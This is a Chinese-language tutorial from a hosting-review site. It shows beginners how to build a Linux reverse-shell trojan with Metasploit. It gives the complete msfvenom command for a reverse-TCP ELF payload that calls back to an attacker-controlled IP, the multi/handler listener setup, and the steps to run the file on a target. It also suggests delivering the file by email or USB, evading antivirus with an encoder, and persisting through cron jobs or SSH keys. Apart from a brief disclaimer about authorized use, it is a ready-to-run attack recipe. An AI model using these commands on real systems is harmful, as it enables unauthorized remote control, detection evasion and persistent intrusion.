在红队渗透测试中,获取目标系统的远程shell是核心目标之一。Metasploit作为强大的渗透框架,能够快速生成免杀木马并建立控制通道。本文面向红队/白帽新手,详细演示如何利用Metasploit制作Linux恶意软件,最终获取目标shell。请仅用于授权测试,非法使用后果自负。
你需要一台攻击机(推荐Kali Linux,内置Metasploit)和一台目标Linux主机(物理机或虚拟机)。确保两者网络互通。Metasploit已预装在Kali中,若未安装可运行sudo apt install metasploit-framework。
使用msfvenom生成反弹shell的ELF可执行文件。命令示例:msfvenom -p linux/x64/shell_reverse_tcp LHOST=攻击机IP LPORT=4444 -f elf -o shell.elf参数说明:- -p:指定payload,这里选用64位反向TCP shell。- LHOST,LPORT:攻击机IP和监听端口。- -f elf:输出ELF格式(Linux可执行文件)。- -o:输出文件名。生成的Linux木马即shell.elf,需要上传到目标机。
在攻击机上启动Metasploit控制台,配置handler监听进入的shell:msfconsoleuse exploit/multi/handlerset payload linux/x64/shell_reverse_tcpset LHOST 攻击机IPset LPORT 4444exploit -j-j参数让监听在后台运行。
将shell.elf上传到目标Linux主机(可通过web下载、邮件、USB等方式)。在目标机上赋予执行权限并运行:chmod +x shell.elf./shell.elf若一切顺利,攻击机的msfconsole会收到反弹shell,输入sessions -i 1进入交互,成功获取shell。
实际红队渗透中,静态编译的木马容易被杀软检测。可使用编码器(如-e x86/shikata_ga_nai)或自定义打包器。持久化可通过添加cron任务、SSH公钥等方式实现。
本文演示了利用Metasploit制作Linux恶意软件获取shell的全过程,这是红队/白帽的必经之路。务必在合法授权范围内使用,禁止非法攻击。掌握Metasploit和Linux木马技术,有助于提升渗透测试能力。
本文由主机测评网于2026-03-11发表在主机测评网_免费VPS_免费云服务器_免费独立服务器,如有疑问,请联系我们。
本文链接:http://www.vpshk.cn/20260330444.html